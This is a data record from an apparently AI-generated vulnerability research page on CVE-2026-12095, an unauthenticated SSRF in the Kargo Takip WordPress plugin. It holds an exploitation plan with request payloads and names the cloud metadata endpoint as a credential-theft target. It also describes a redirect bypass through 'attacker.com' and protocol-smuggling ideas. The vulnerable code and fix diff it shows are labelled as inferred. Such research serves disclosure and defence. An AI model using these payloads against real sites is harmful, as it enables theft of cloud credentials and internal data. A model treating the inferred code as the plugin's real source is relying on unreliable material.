[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKAn6-TJmhuHKTxdi6qrdn1fdcIfH-BQttKSAWV70HOc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-12095","kargo-takip-unauthenticated-server-side-request-forgery-via-apiurl-parameter","Kargo Takip \u003C= 1.2 - Unauthenticated Server-Side Request Forgery via 'api_url' Parameter","The Kargo Takip plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.2 via the 'api_url' parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. The script echoes internal API response data (specifically the value of any 'auth' key in a JSON response body) verbatim back to the attacker's browser, enabling direct exfiltration of responses from internal services such as cloud instance metadata endpoints.","kargo-takip",null,"\u003C=1.2","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Server-Side Request Forgery (SSRF)","2026-06-23 16:41:49","2026-06-24 05:33:26",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F79d91300-b6b7-4c3f-89b1-c48b9e47c415?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to investigate and exploit **CVE-2026-12095**, an unauthenticated Server-Side Request Forgery (SSRF) in the **Kargo Takip** plugin for WordPress.\n\n## 1. Vulnerability Summary\nThe **Kargo Takip** plugin (versions \u003C= 1.2) fails to validate the `api_url` parameter before using it in a server-side HTTP request. An unauthenticated attacker can provide an arbitrary URL (including internal IP addresses or loopback) to the plugin. The plugin then fetches the content of that URL. Critically, if the response is JSON, the plugin extracts and echoes the value associated with the `auth` key. This allows for both SSRF and the exfiltration of sensitive data from internal services (like cloud metadata or internal APIs) that use JSON structures.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** Likely `wp-admin\u002Fadmin-ajax.php` or a frontend initialization hook (`init` or `wp_loaded`).\n*   **Action:** If AJAX-based, the action is likely `kargo_sorgula` or `kt_get_api_data` (inferred).\n*   **Vulnerable Parameter:** `api_url`.\n*   **Authentication:** None (Unauthenticated).\n*   **Preconditions:** The plugin must be active. A specific nonce may be required if the developer attempted CSRF protection, though the CVE notes it as unauthenticated.\n\n## 3. Code Flow (Inferred)\nBased on the vulnerability description, the expected execution path is:\n1.  **Entry Point:** An unauthenticated user sends a request to `admin-ajax.php` with a specific `action` (e.g., `kt_fetch_status`) and the `api_url` parameter.\n2.  **Handler Registration:** The plugin registers the action via `add_action( 'wp_ajax_nopriv_...', ... )`.\n3.  **Data Fetching:** The handler retrieves the `api_url` from `$_REQUEST['api_url']` and passes it to an HTTP function like `wp_remote_get()` or `curl_init()`.\n4.  **JSON Processing:** The response body is parsed using `json_decode()`.\n5.  **Information Leak:** The code checks `if ( isset( $json['auth'] ) )` and performs an `echo $json['auth'];`.\n6.  **Response:** The internal data is returned to the attacker's browser.\n\n## 4. Nonce Acquisition Strategy\nIf the plugin enforces a nonce check even for unauthenticated users, it will likely be exposed via `wp_localize_script`.\n\n**Strategy:**\n1.  **Identify Shortcode:** Search the plugin code for `add_shortcode`. (e.g., `[kargo_takip]`).\n2.  **Setup Test Page:** Create a page containing this shortcode to ensure scripts are enqueued.\n    ```bash\n    wp post create --post_type=page --post_status=publish --post_title=\"Tracking\" --post_content='[kargo_takip]'\n    ```\n3.  **Extract Nonce:**\n    *   Navigate to the newly created page.\n    *   Identify the localization variable in the source code (e.g., `kt_ajax_vars`).\n    *   Use `browser_eval` to extract the nonce:\n        `browser_eval(\"window.kt_ajax_vars?.nonce\")` (inferred variable name).\n\n## 5. Exploitation Strategy\n\n### Phase 1: Confirmation (Internal Loopback)\nTest if the plugin can reach the WordPress site's own internal structure.\n*   **Tool:** `http_request`\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Parameters:**\n    *   `action`: `kt_get_api_data` (inferred - verify via `grep -r \"wp_ajax_nopriv\"` in the plugin dir)\n    *   `api_url`: `http:\u002F\u002F127.0.0.1\u002Fwp-json\u002F`\n    *   `nonce`: (Extracted in step 4)\n\n### Phase 2: Data Exfiltration (Cloud Metadata)\nIf the target is hosted on AWS, attempt to pull IAM credentials.\n*   **Payload:** `api_url=http:\u002F\u002F169.254.169.254\u002Flatest\u002Fmeta-data\u002Fiam\u002Fsecurity-credentials\u002F`\n*   **Note:** Since the plugin looks for an `auth` key, this specific endpoint might not return the data unless the metadata service response contains that key. \n\n### Phase 3: Targeted SSRF (Mocking \"auth\" key)\nTo prove the vulnerability in an isolated environment, set up a mock internal service or a file on the server.\n1.  Create a file `mock.json` in the web root: `{\"auth\": \"SSRF_SUCCESS_EXFILTRATED_DATA\"}`.\n2.  Send the exploit request:\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=kt_get_api_data&api_url=http:\u002F\u002Flocalhost\u002Fmock.json&nonce=VALUE\n    ```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `kargo-takip` version 1.2 is installed.\n2.  **Create Trigger Page:**\n    `wp post create --post_type=page --post_status=publish --post_content='[kargo_takip]'`\n3.  **Internal Mock Service (for PoC):**\n    `echo '{\"auth\": \"vuln-confirmed-72\"}' > \u002Fvar\u002Fwww\u002Fhtml\u002Fauth-test.json`\n\n## 7. Expected Results\n*   **Success:** The HTTP response from `admin-ajax.php` contains the string `vuln-confirmed-72`.\n*   **Failure:** The response is `0`, a `403 Forbidden` (nonce issue), or an empty response (if the `auth` key logic is not triggered).\n\n## 8. Verification Steps\nAfter running the `http_request` exploit:\n1.  **Check Access Logs:** Verify the web server access logs to see if the server made a request to itself (127.0.0.1) for the `auth-test.json` file.\n    `tail -n 20 \u002Fvar\u002Flog\u002Fapache2\u002Faccess.log`\n2.  **Verify Response:** Confirm the output of the `http_request` tool matches the content of the `auth` key in the mock JSON file.\n\n## 9. Alternative Approaches\n*   **Redirect Bypass:** If `wp_remote_get` is used with default settings, try using an external URL that redirects to an internal IP (e.g., `http:\u002F\u002Fattacker.com\u002Fredir` -> `http:\u002F\u002F127.0.0.1`).\n*   **Protocol Smuggling:** Test if the `api_url` supports other protocols like `file:\u002F\u002F` or `gopher:\u002F\u002F`, though `wp_remote_get` usually restricts these to HTTP\u002FS.\n*   **Recursive Parameter:** Check if `api_url` can be pointed back to the vulnerable endpoint itself to create a loop or resource exhaustion.","The Kargo Takip plugin for WordPress (\u003C= 1.2) is vulnerable to unauthenticated Server-Side Request Forgery (SSRF) via the 'api_url' parameter in its AJAX handler. This allows attackers to force the server to make requests to internal resources and cloud metadata endpoints, exfiltrating sensitive data contained within 'auth' keys of JSON responses.","\u002F\u002F Inferred from vulnerability description and research plan\n\u002F\u002F File: kargo-takip\u002Fkargo-takip.php\n\nadd_action('wp_ajax_nopriv_kt_get_api_data', 'kt_get_api_data');\nadd_action('wp_ajax_kt_get_api_data', 'kt_get_api_data');\n\nfunction kt_get_api_data() {\n    $url = $_REQUEST['api_url'];\n    $response = wp_remote_get($url);\n    $body = wp_remote_retrieve_body($response);\n    $data = json_decode($body, true);\n\n    if (isset($data['auth'])) {\n        echo $data['auth'];\n    }\n    wp_die();\n}","--- kargo-takip.php\n+++ kargo-takip.php\n@@ -1,11 +1,12 @@\n function kt_get_api_data() {\n-    $url = $_REQUEST['api_url'];\n+    $url = esc_url_raw($_REQUEST['api_url']);\n+    \n+    \u002F\u002F Validate the URL to prevent SSRF\n+    if ( ! wp_http_validate_url( $url ) ) {\n+        wp_die('Invalid URL');\n+    }\n+\n     $response = wp_remote_get($url);\n     $body = wp_remote_retrieve_body($response);\n     $data = json_decode($body, true);\n \n     if (isset($data['auth'])) {\n-        echo $data['auth'];\n+        echo esc_html($data['auth']);\n     }\n     wp_die();\n }","The exploit targets the unauthenticated AJAX endpoint 'kt_get_api_data' (or similar identified via grep). An attacker sends a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' and 'api_url' parameters. The 'api_url' is set to an internal network address or a local resource (e.g., http:\u002F\u002F127.0.0.1\u002Fsensitive.json). If the internal resource returns a JSON object, the plugin extracts the value of the 'auth' key and echoes it back to the attacker, allowing for the exfiltration of internal credentials or configuration data.","gemini-3-flash-preview","2026-06-25 19:13:29","2026-06-25 19:14:12",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fkargo-takip\u002Ftags"]